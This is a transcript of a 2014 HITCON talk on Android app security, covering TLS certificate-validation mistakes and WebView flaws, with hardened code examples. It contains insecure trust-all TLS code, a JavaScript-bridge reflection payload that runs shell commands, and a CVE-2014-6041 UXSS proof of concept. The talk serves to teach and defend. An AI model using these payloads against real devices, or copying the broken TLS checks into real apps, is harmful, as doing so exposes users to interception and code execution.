[2014/10/06] hitcon freetalk - app security on android
TRANSCRIPT
1. Client Hello
2. Server Hello
3. Certificate
4. ServerHelloDone
5. ClientKeyExchange
6. ChangeCipherSpec
7. Handshake Finished
8. ChangeCipherSpec
9. Handshake Finished
10. Application Data (HTTP)
11. Application Data (HTTP)
Server Authentication (step 3: the server's certificate is what the client uses to authenticate the server)
The SSL encrypted connection: handshake process
Checking the server certificate
‧ Simply going through an SSL encrypted connection does not make it secure.
‧ The client must check that the certificate the server presents is trustworthy and valid (chain to a trusted CA, unexpired, and matching the host name).
Man-in-the-Middle Attack (diagram: Victim ↔ Attacker ↔ Server; the attacker terminates the victim's TLS connection and opens its own to the server)
// Default behaviour: the platform validates the server certificate and host name for you
URL url = new URL("https://wikipedia.org");
URLConnection urlConnection = url.openConnection();
InputStream in = urlConnection.getInputStream();
…
// WebView default: on a certificate error the load is cancelled unless the app overrides onReceivedSslError
WebView mWebView = (WebView) findViewById(R.id.webView);
mWebView.loadUrl("https://wikipedia.org");
ref: http://devco.re/blog/2014/08/15/ssl-mishandling-on-mobile-app-development/
ref: http://www.zdnet.com/hundreds-of-android-apps-open-to-ssl-linked-intercept-fail-7000033365/
ref: http://www.kb.cert.org/vuls/id/582497
ref: http://www.find.org.tw/find/home.aspx?page=many&id=385
An SSL connection whose certificate has already been judged invalid is allowed to continue by calling handler.proceed():

mWebView.setWebViewClient(new WebViewClient() {
    @Override
    public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
        handler.proceed(); // Ignore SSL certificate errors: any forged certificate is accepted
    }
});
// "Trust-all" TrustManager: both check methods are empty, so no chain is ever rejected
TrustManager[] trustAllManager = new TrustManager[] {
    new X509TrustManager() {
        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType) {
        }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType) {
        }

        @Override
        public X509Certificate[] getAcceptedIssuers() {
            return null;
        }
    }
};

SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, trustAllManager, null);

The component that performs SSL certificate checks by default is replaced with one that ignores them entirely.
URL url = new URL("https://www.example.com/");
HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();

// Apache HttpClient's allow-all verifier (org.apache.http.conn.ssl.SSLSocketFactory) …
conn.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
// … or a hand-written verifier that always says yes
conn.setHostnameVerifier(new HostnameVerifier() {
    @Override
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
});

No comparison is made: every host name passes the check, so a valid certificate for any other domain is accepted for this one.
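The hardened counterparts of the three weak patterns above (proceeding past onReceivedSslError, a trust-all TrustManager, an allow-all HostnameVerifier), which also carry out the server-certificate check the handshake section says is required. This is an added example written for this transcript, not code from the talk. The host name "api.example.com" and the SPKI pin value are placeholders, and the pin format (Base64 of SHA-256 over the leaf certificate's SubjectPublicKeyInfo) is this example's own choice.

```java
import android.net.http.SslError;
import android.util.Base64;
import android.webkit.SslErrorHandler;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.InputStream;
import java.net.URL;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

public final class SafeTls {

    // Placeholder pin (assumption): replace with the real SPKI hash of api.example.com's certificate.
    static final String PIN_SHA256_BASE64 = "REPLACE_WITH_REAL_PIN=";

    // 1. WebView: never call handler.proceed() on an SSL error; cancel the load instead.
    public static WebViewClient strictClient() {
        return new WebViewClient() {
            @Override
            public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
                handler.cancel(); // abort rather than silently trusting an invalid certificate
            }
        };
    }

    // 2. TrustManager: keep the platform's chain validation and ADD a pin on the leaf's
    //    public key, so a certificate issued by a rogue or compromised CA is still rejected.
    public static X509TrustManager pinningTrustManager(final String expectedPin) throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null); // null = the platform's default CA store
        X509TrustManager platform = null;
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) { platform = (X509TrustManager) tm; break; }
        }
        if (platform == null) throw new IllegalStateException("no X509TrustManager available");
        final X509TrustManager delegate = platform;

        return new X509TrustManager() {
            @Override
            public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
                delegate.checkClientTrusted(chain, authType);
            }

            @Override
            public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
                delegate.checkServerTrusted(chain, authType); // normal PKI validation first
                if (chain == null || chain.length == 0) throw new CertificateException("empty chain");
                String actual = spkiSha256(chain[0]); // chain[0] is the server (leaf) certificate
                if (!actual.equals(expectedPin)) {
                    throw new CertificateException("certificate pin mismatch: " + actual);
                }
            }

            @Override
            public X509Certificate[] getAcceptedIssuers() {
                return delegate.getAcceptedIssuers(); // never return null here
            }
        };
    }

    // SHA-256 over the DER-encoded SubjectPublicKeyInfo, Base64 without line breaks.
    static String spkiSha256(X509Certificate cert) throws CertificateException {
        try {
            byte[] spki = cert.getPublicKey().getEncoded();
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(spki);
            return Base64.encodeToString(digest, Base64.NO_WRAP);
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    // 3. HostnameVerifier: leave the default alone. HttpsURLConnection already checks the
    //    host name against the certificate, so setHostnameVerifier is deliberately not called.
    public static InputStream openPinned() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { pinningTrustManager(PIN_SHA256_BASE64) }, null);
        HttpsURLConnection conn = (HttpsURLConnection) new URL("https://api.example.com/").openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        return conn.getInputStream();
    }
}
```

Pinning the public key rather than the whole certificate survives routine certificate renewal as long as the key is kept; ship a backup pin for the next key before rotating, otherwise a rotation locks the app out.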
class JsObject {
    public String toString() {
        return "Hello World";
    }
}

webView.getSettings().setJavaScriptEnabled(true);
webView.addJavascriptInterface(new JsObject(), "injectedObject"); // reachable from page script as injectedObject
webView.loadUrl("http://www.example.com/"); // plain HTTP: the page content can be swapped by a MITM

<html>
<head>
…
<script>
alert(injectedObject.toString());
</script>
</head>
<body>…</body>
</html>

Result: the alert shows "Hello World"
<script>
// From the injected object, walk via reflection to java.lang.Runtime and run a shell command
function execute(cmdArgs) {
    return injectedObject.getClass().forName("java.lang.Runtime")
        .getMethod("getRuntime", null)
        .invoke(null, null).exec(cmdArgs);
}
execute(["/system/bin/sh", "-c", "cat vuln >> attacker.txt"]);
</script>
Java Reflection API
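How to expose a bridge without handing the page getClass() and the reflection path above: an added example for this transcript, not code from the talk. The class, method names and page URL are illustrative. The defence relies on two platform facts: from API 17 (Android 4.2) only methods annotated with @JavascriptInterface are callable from JavaScript, and that rule is enforced only when the app's targetSdkVersion is 17 or higher.

```java
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

public final class SafeJsBridge {

    // Only annotated methods are visible to page script on API 17+; inherited methods such as
    // getClass() are not, which closes the getClass().forName("java.lang.Runtime") route.
    public static final class JsObject {
        @JavascriptInterface
        public String greeting() {
            return "Hello World";
        }

        // Not annotated: invisible to the page on API 17+ (illustrative method name).
        public String internalOnly() {
            return "not exposed";
        }
    }

    public static void attach(WebView webView) {
        // On devices below 4.2 the annotation is ignored and every public method, including
        // getClass(), is reachable through reflection: do not register a bridge there at all.
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.getSettings().setJavaScriptEnabled(false);
            return;
        }
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new JsObject(), "injectedObject");
        // Drop the bridge the platform registers by itself (the one behind CVE-2014-1939 in the
        // table below); removeJavascriptInterface is available from API 11.
        webView.removeJavascriptInterface("searchBoxJavaBridge_");
        // Only load pages over HTTPS: script injected into an http:// page by a MITM would get
        // the same access to injectedObject as the site's own script.
        webView.loadUrl("https://www.example.com/");
    }
}
```

Even with the annotation, anything you do expose is callable by every script the page runs, including third-party scripts it includes, so keep the bridge surface to the few methods the page actually needs.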
Test URL: http://devstd.in/cve/2014-6041/
Test environment: Android 4.1.1

<html>
<head>
<title>CVE-2014-6041 UXSS DEMO</title>
</head>
<body>
<!-- the cross-origin frame whose content the attacker page should not be able to read -->
<iframe name="target_frame" src="http://devco.re/"></iframe>
<br />
<!-- a leading NUL byte lets the javascript: URL bypass the same-origin check and run inside target_frame -->
<input type="button" value="go" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)', 'target_frame')" />
</body>
</html>
Browsers tested:
UC Browser HD 3.4.1.483
CM Browser 5.0.74
Maxthon Browser 4.3.2.2000
Test results
Android version   CVE-2012-6636    CVE-2014-1939    CVE-2014-6041
Android 2.X       vulnerable       non-vulnerable   non-vulnerable
Android 3.X       vulnerable       vulnerable       non-vulnerable
Android 4.0.X     vulnerable       vulnerable       vulnerable
Android 4.1.X     vulnerable       vulnerable       vulnerable
Android 4.2.X     non-vulnerable   non-vulnerable   vulnerable
Android 4.3.X     non-vulnerable   non-vulnerable   vulnerable
Android 4.4.X     non-vulnerable   non-vulnerable   non-vulnerable